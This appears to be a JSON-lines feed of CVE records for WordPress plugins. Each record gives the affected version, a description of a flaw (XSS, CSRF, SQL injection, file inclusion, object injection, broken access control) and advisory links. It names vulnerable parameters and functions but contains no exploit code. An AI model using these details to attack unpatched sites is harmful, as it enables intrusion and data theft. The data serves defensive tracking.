{"CVE_ID":"CVE-2023-0335","slug":"wp-shamsi","versionImpact":"4.3.3","description":"The WP Shamsi WordPress plugin through 4.3.3 has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7a20bea-c3d5-431b-bdcf-e189c81a561a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7a20bea-c3d5-431b-bdcf-e189c81a561a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1236","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Filterable Controls label icon parameter in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3065","slug":"paypal-pay-buy-donation-and-cart-buttons-shortcode","versionImpact":"1.7","description":"The PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c596c278-4f16-4830-8e6e-5e1392d4d118?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c596c278-4f16-4830-8e6e-5e1392d4d118?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paypal-pay-buy-donation-and-cart-buttons-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paypal-pay-buy-donation-and-cart-buttons-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4757","slug":"logo-manager-for-enamad","versionImpact":"0.7.0","description":"The Logo Manager For Enamad WordPress plugin through 0.7.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b54b55e0-b184-4c90-ba94-feda0997bf2a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b54b55e0-b184-4c90-ba94-feda0997bf2a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7860","slug":"simple-headline-rotator","versionImpact":"1.0","description":"The Simple Headline Rotator WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/584156d7-928e-48c9-8b81-539ccb06f3f5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/584156d7-928e-48c9-8b81-539ccb06f3f5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8802","slug":"clio-grow-form","versionImpact":"1.0.2","description":"The Clio Grow plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10fcfddf-0ed7-471d-86bf-c38e7021c6a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10fcfddf-0ed7-471d-86bf-c38e7021c6a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clio-grow-form\\\/trunk\\\/includes\\\/class-grow-form-settings.php#L550\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clio-grow-form\\\/trunk\\\/includes\\\/class-grow-form-settings.php#L550\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12332","slug":"wpschoolpress","versionImpact":"2.2.14","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'cid' parameter in all versions up to, and including, 2.2.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Student\/Parent-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0248af2-f9f3-4652-bf6d-b46aa91b66f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0248af2-f9f3-4652-bf6d-b46aa91b66f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13778","slug":"hmenu","versionImpact":"1.16.5","description":"The Hero Mega Menu - Responsive WordPress Menu Plugin plugin for WordPress is vulnerable to SQL Injection via several functions in all versions up to, and including, 1.16.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bdf04e6-6d9d-41a3-ac54-1a95f4617ea4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bdf04e6-6d9d-41a3-ac54-1a95f4617ea4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4381","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the \u2018$id\u2019 variable of the getSpace() function in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0605bc15-3a97-46f4-8244-29220ed5ab31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0605bc15-3a97-46f4-8244-29220ed5ab31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1661","slug":"display-metadata","versionImpact":"0.4.1","description":"The Display post meta, term meta, comment meta, and user meta plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post metadata in versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-metadata\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-metadata\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f90c0d8-ede6-4f24-870f-19e888238e93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f90c0d8-ede6-4f24-870f-19e888238e93?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3947","slug":"video-conferencing-with-zoom-api","versionImpact":"4.2.1","description":"The Video Conferencing with Zoom plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'vczapi_encrypt_decrypt' function in versions up to, and including, 4.2.1. This makes it possible for unauthenticated attackers to decrypt and view the meeting id and password.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Helpers\\\/Encryption.php?rev=2942302\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Helpers\\\/Encryption.php?rev=2942302\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba2515d9-ced0-4b49-87c4-04c8391c2608?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba2515d9-ced0-4b49-87c4-04c8391c2608?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/tags\\\/4.2.1\\\/includes\\\/helpers.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/tags\\\/4.2.1\\\/includes\\\/helpers.php#L546\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1235","slug":"addons-for-elementor","versionImpact":"8.3.2","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom class field in all versions up to, and including, 8.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1533","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML Element in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Requires Elementor and the Phlox theme to be installed.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcd2c5e-4969-4530-b3ab-930c5051d8f1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcd2c5e-4969-4530-b3ab-930c5051d8f1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6532","slug":"sheet-to-wp-table-for-google-sheet","versionImpact":"1.0.1","description":"The Sheet to Table Live Sync for Google Sheet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's STWT_Sheet_Table shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f674d3bf-9927-48d9-85c7-34946e8a2eeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f674d3bf-9927-48d9-85c7-34946e8a2eeb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sheet-to-wp-table-for-google-sheet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sheet-to-wp-table-for-google-sheet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sheet-to-wp-table-for-google-sheet\\\/trunk\\\/app\\\/service\\\/post\\\/meta-box.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sheet-to-wp-table-for-google-sheet\\\/trunk\\\/app\\\/service\\\/post\\\/meta-box.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134934\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134934\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7859","slug":"visual-sound","versionImpact":"1.03","description":"The Visual Sound WordPress plugin through 1.03 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12327","slug":"lazyload-background-images","versionImpact":"1.0.7","description":"The LazyLoad Background Images plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pblzbg_save_settings() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d57fa9f3-b1c0-4601-96d9-178d0dba1332?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d57fa9f3-b1c0-4601-96d9-178d0dba1332?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13226","slug":"custom-login-page","versionImpact":"2.8.1","description":"The A5 Custom Login Page WordPress plugin through 2.8.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd09fe99-2334-4d6f-8a70-e1cd856b1486\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd09fe99-2334-4d6f-8a70-e1cd856b1486\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13777","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 6.91 via deserialization of untrusted input from the 'margs' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec4633a-0742-4646-accd-cc0b9e01302a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec4633a-0742-4646-accd-cc0b9e01302a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5286","slug":"bold-page-builder","versionImpact":"5.3.6","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018additional_settings\u2019 parameter in all versions up to, and including, 5.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.7\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.7\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae076e4-ad15-4069-be10-f0f4aced4132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae076e4-ad15-4069-be10-f0f4aced4132?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4380","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3078861b-3a16-4e93-a4f6-5ae885bc0747?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3078861b-3a16-4e93-a4f6-5ae885bc0747?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2987","slug":"wordapp","versionImpact":"1.5.0","description":"The Wordapp plugin for WordPress is vulnerable to authorization bypass due to an use of insufficiently unique cryptographic signature on the 'wa_pdx_op_config_set' function in versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to the plugin to change the 'validation_token' in the plugin config, providing access to the plugin's remote control functionalities, such as creating an admin access URL, which can be used for privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/config.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/config.php#L59\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/access.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/access.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/pdx.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/pdx.php#L64\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80440bfa-4a02-4441-bbdb-52d7dd065a9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80440bfa-4a02-4441-bbdb-52d7dd065a9d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25972","slug":"iksweb","versionImpact":"3.6","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in IKSWEB WordPress ????? plugin <=\u00a03.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/iksweb\\\/wordpress-start-plugin-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/iksweb\\\/wordpress-start-plugin-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
